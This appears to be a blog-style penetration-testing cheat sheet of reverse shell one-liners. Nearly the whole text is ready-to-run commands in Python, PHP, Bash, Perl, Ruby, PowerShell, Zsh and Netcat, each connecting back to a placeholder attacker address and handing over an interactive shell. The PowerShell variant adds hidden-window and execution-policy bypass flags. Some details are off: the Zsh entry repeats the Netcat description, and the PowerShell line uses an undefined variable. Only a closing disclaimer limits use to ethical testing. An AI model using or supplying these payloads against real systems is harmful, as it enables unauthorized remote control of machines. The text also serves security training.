In the world of cybersecurity and penetration testing, reverse shells are invaluable tools for gaining control over a remote system. This cheat sheet offers a comprehensive guide to executing reverse shells using various programming languages and tools. Whether you’re a security enthusiast, penetration tester, or just curious about reverse shells, this guide is tailored for you.
Introduction to Reverse Shells
A reverse shell is a shell session initiated from a remote machine that opens back to the attacker’s machine. This is particularly useful in bypassing firewall restrictions that prevent inbound connections.
Python Reverse Shell
- Python’s simplicity and availability on most Unix systems make it a popular choice for reverse shells.
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",YOUR_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'PHP Reverse Shell
- PHP scripts are often used for web-based exploits.
$ php -r '$sock=fsockopen("YOUR_IP",YOUR_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'Bash Reverse Shell
- Bash, available on almost every Linux/Unix machine, can be used for quick reverse connections.
$ bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1Perl Reverse Shell
- Perl is another scripting language commonly found on Unix-like systems.
$ perl -e 'use Socket;$i="YOUR_IP";$p=YOUR_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Ruby Reverse Shell
- Ruby’s scripting capabilities allow for effective reverse shell implementations
$ ruby -rsocket -e'f=TCPSocket.open("YOUR_IP",YOUR_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'PowerShell Reverse Shell
- PowerShell provides a modern approach to reverse shells in Windows environments.
$ powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("YOUR_IP",YOUR_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Zsh Reverse Shell
- Netcat, often dubbed the Swiss army knife of networking, is a favorite for reverse shells.
$ zsh -c 'zmodload zsh/net/tcp && ztcp YOUR_IP YOUR_PORT && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'Netcat Reverse Shell
- Netcat, often dubbed the Swiss army knife of networking, is a favorite for reverse shells.
$ nc -e /bin/sh YOUR_IP YOUR_PORTConclusion
This cheat sheet provides a quick reference to various methods of establishing reverse shells. Remember to replace “YOUR_IP” and “YOUR_PORT” with your listening address and port. It’s crucial to note that the use of reverse shells should be limited to ethical hacking, penetration testing, and educational purposes. Unauthorized access to computer systems is illegal and punishable by law.
